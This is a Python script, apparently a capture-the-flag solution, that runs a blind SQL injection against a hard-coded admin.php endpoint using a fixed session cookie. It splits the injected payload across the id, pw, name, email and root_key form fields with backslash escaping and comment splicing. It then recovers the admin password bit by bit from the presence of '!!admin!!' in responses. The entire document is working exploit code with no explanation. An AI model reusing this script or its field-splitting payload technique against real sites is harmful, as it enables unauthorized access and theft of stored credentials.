import requests cookies={'PHPSESSID':"06p41u34qrpuucvgig8bml2ah0"} url= "http://35.187.213.245/567be90b9c983262ee3c53aca0366a78/admin.php" passwd="" for j in range(1,9): for i in range (1,25): if(j==1): data={"id":"\\","pw":"||id IN(\"admin\")&&left(reverse(/*","name":"*/left(rpad(reverse(conv(hex(/*","email":"*/left(reverse(left(pw," +str(j)+")),1))/*","root_key":"*/,16,2)),24,2),"+str(i)+")),1)IN(1)#"} elif(j==4 or j==5): data={"id":"\\","pw":"||id IN(\"admin\")&&left(reverse(/*","name":"*/left(rpad(reverse(conv(hex(/*","email":"*/left(reverse(left(pw,"+str(j)+")),1))/*","root_key":"*/,16,2)),16,2),"+str(i)+")),1)IN(1)#"} if(i==17): break else : data={"id":"\\","pw":"||id IN(\"admin\")&&left(reverse(/*","name":"*/left(rpad(reverse(conv(hex(/*","email":"*/left(reverse(left(pw,"+str(j)+")),1))/*","root_key":"*/,16,2)),8,2),"+str(i)+")),1)IN(1)#"} if(i==9): break res=requests.post(url,data=data,cookies=cookies) if((res.text).find("!!admin!!")==-1): passwd+="0" else: passwd+="1" passwd=passwd[::-1] if(j==1): #hint use print (str(j)+"passwd : "+passwd[:4]+"1"+passwd[5:13]+"0"+passwd[14:]) passwd="" continue if(j==4 or j==5): #hint use print (str(j)+"passwd : "+passwd[:6]+"1"+passwd[7:]) passwd="" continue print (str(j)+"passwd : "+passwd) passwd=""; # need Binary number --> utf8 convert